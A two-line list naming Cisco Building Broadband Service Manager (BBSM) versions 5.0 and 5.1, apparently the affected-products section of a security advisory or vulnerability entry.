Cisco Building Broadband Service Manager (BBSM) 5.0
Cisco Building Broadband Service Manager (BBSM) 5.1
